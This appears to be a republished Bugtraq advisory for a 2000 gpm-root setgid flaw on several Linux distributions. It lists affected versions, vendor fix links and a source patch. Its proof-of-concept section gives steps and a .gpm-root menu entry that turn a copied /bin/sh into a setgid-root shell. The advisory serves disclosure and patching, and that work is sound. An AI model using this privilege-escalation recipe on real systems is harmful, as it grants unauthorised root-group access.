Multiple Linux Vendor gpm Setgid Vulnerability

BID:1069

Info

Multiple Linux Vendor gpm Setgid Vulnerability

Bugtraq ID: 1069
Class: Design Error
CVE:
Remote: No
Local: Yes
Published: Mar 22 2000 12:00AM
Updated: Mar 22 2000 12:00AM
Credit: This vulnerability was posted to the Bugtraq mailing list on March 22, 2000 by Egmont Koblinger <[email protected]>
Vulnerable: SuSE Linux 6.3
SuSE Linux 6.2
SuSE Linux 6.1
SuSE Linux 6.0
SuSE Linux 5.3
Redhat Linux 6.2 i386
Redhat Linux 6.1 i386
Redhat Linux 6.0
Debian Linux 2.2 pre potato
Debian Linux 2.2
Debian Linux 2.1
Debian Linux 2.0
Alessandro Rubini gpm 1.19
+ Redhat Linux 6.2 i386
+ Redhat Linux 6.1 i386
+ Redhat Linux 6.0
+ Turbolinux Turbolinux 6.0.4
+ Turbolinux Turbolinux 6.0.3
+ Turbolinux Turbolinux 6.0.2
+ Turbolinux Turbolinux 6.0.1
+ Turbolinux Turbolinux 6.0
Alessandro Rubini gpm 1.18.1
+ Redhat Linux 6.0
+ Redhat Linux 5.2 i386
+ Redhat Linux 5.1
Not Vulnerable:

Discussion

Multiple Linux Vendor gpm Setgid Vulnerability

A vulnerability exists in the gpm-root program, part of the gpm package. This package is used to enable mice on the consoles of many popular Linux distributions. The problem is a design error, caused when a programmer chose to attempt to revert to the running users groups, after having called setuid to the users id already. The setgid call fails, and the process maintains the groups the gpm-root program is running as. This is usually the 'root' group.

This vulnerability requires the user have console access.

Exploit / POC

Multiple Linux Vendor gpm Setgid Vulnerability

cp /bin/sh /tmp
create a .gpm-root file in ~ with the following:
button 1 {
name "create a setgid shell"
"setgid shell" f.bgcmd "chgrp root /tmp/sh; chmod 2755 /tmp/sh"
}

click control-left mouse button, and click "setgid shell"
execute /tmp/sh

Solution / Fix

Multiple Linux Vendor gpm Setgid Vulnerability

Solution:
A fix has been released for SuSE Linux. It is available at:
6.1:
ftp://ftp.suse.com/pub/suse/i386/update/6.1/ap1/gpm.rpm
6.2:
ftp://ftp.suse.com/pub/suse/i386/update/6.2/ap1/gpm.rpm
6.3:
ftp://ftp.suse.com/pub/suse/i386/update/6.3/ap1/gpm.rpm

The author has indicated a fix will be present in versions 1.19.1, which will be the final release by the author.

A temporary solution is to disable gpm-root.

A patch to fix the problem in gpm-1.19.0 was made available:
diff -u -r -N ../gpm-1.19.0.orig/doc/doc.gpm ./doc/doc.gpm
--- ../gpm-1.19.0.orig/doc/doc.gpm Mon Feb 7 23:34:00 2000
+++ ./doc/doc.gpm Thu Mar 23 14:37:43 2000
@@ -1969,6 +1969,12 @@
be broken by this daemon. Things should be sufficiently secure, but
if you find a hole please tell me about it.

+@item -r
+ Always run commands as root instead of the user who owns the tty.
+ Implies -u. This is useful for those system administrators who
+ put menu entries to reboot or halt the system, start or stop
+ xdm, change keyboard layout etc.
+
@item -D
Do not automatically enter background operation when started,
and log messages to the standard error stream, not the syslog
diff -u -r -N ../gpm-1.19.0.orig/gpm-root.y ./gpm-root.y
--- ../gpm-1.19.0.orig/gpm-root.y Thu Oct 7 20:15:18 1999
+++ ./gpm-root.y Thu Mar 23 14:37:43 2000
@@ -41,6 +41,7 @@
#include <sys/syslog.h>
#include <signal.h> /* sigaction() */
#include <pwd.h> /* pwd entries */
+#include <grp.h> /* initgroups() */
#include <sys/kd.h> /* KDGETMODE */
#include <sys/stat.h> /* fstat() */
#include <sys/utsname.h> /* uname() */
@@ -117,6 +118,7 @@
int opt_mod = 4; /* control */
int opt_buf = 0; /* ask the kernel about it */
int opt_user = 1; /* allow user cfg files */
+int opt_root = 0; /* run everything as root */

@@ -447,6 +449,7 @@
void f__fix(struct passwd *pass)
{
setgid(pass->pw_gid);
+ initgroups(pass->pw_name, pass->pw_gid);
setuid(pass->pw_uid);
setenv("HOME", pass->pw_dir, 1);
setenv("LOGNAME", pass->pw_name,1);
@@ -539,7 +542,7 @@
return 1;

case 0:
- setuid(uid);
+ if (opt_root) uid=0;
pass=getpwuid(uid);
if (!pass) exit(1);
f__fix(pass);
@@ -926,6 +929,7 @@
printf(" Valid options are\n"
" -m <number-or-name> modifier to use\n"
" -u inhibit user configuration files\n"
+ " -r run commands as root\n"
" -D don't auto-background and run as daemon\n"
" -V <verbosity-delta> increase amount of logged messages\n"
);
@@ -971,12 +975,13 @@
int opt;

gpm_log_daemon = 1;
- while ((opt = getopt(argc, argv,"m:uDV::")) != -1)
+ while ((opt = getopt(argc, argv,"m:urDV::")) != -1)
{
switch (opt)
{
case 'm': opt_mod=getmask(optarg, tableMod); break;
case 'u': opt_user=0; break;
+ case 'r': opt_root=1; opt_user=0; break;
case 'D': gpm_log_daemon = 0; break;
case 'V':
gpm_debug_level += (0 == optarg ? 1 : strtol(optarg, 0, 0));

A fix has been made available in gpm-1.19.2.
-------------------------------------------------------------

Turbo Linux users can use the following fix:

Update the packages from our ftp server by running the following command for each package:

rpm -Fvh ftp_path_to_filename

Where ftp_path_to_filename is the following:

ftp://ftp.turbolinux.com/pub/updates/6.0/security/gpm-1.19.2-5.i386.rpm
ftp://ftp.turbolinux.com/pub/updates/6.0/security/gpm-devel-1.19.2-5.i386.rpm


Alessandro Rubini gpm 1.18.1

Alessandro Rubini gpm 1.19

SuSE Linux 5.3

SuSE Linux 6.1

SuSE Linux 6.2

SuSE Linux 6.3

References

Multiple Linux Vendor gpm Setgid Vulnerability

References:
© CVE.report 2026 |

Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.

CVE, CWE, and OVAL are registred trademarks of The MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. This site includes MITRE data granted under the following license.

Free CVE JSON API cve.report/api

CVE.report and Source URL Uptime Status status.cve.report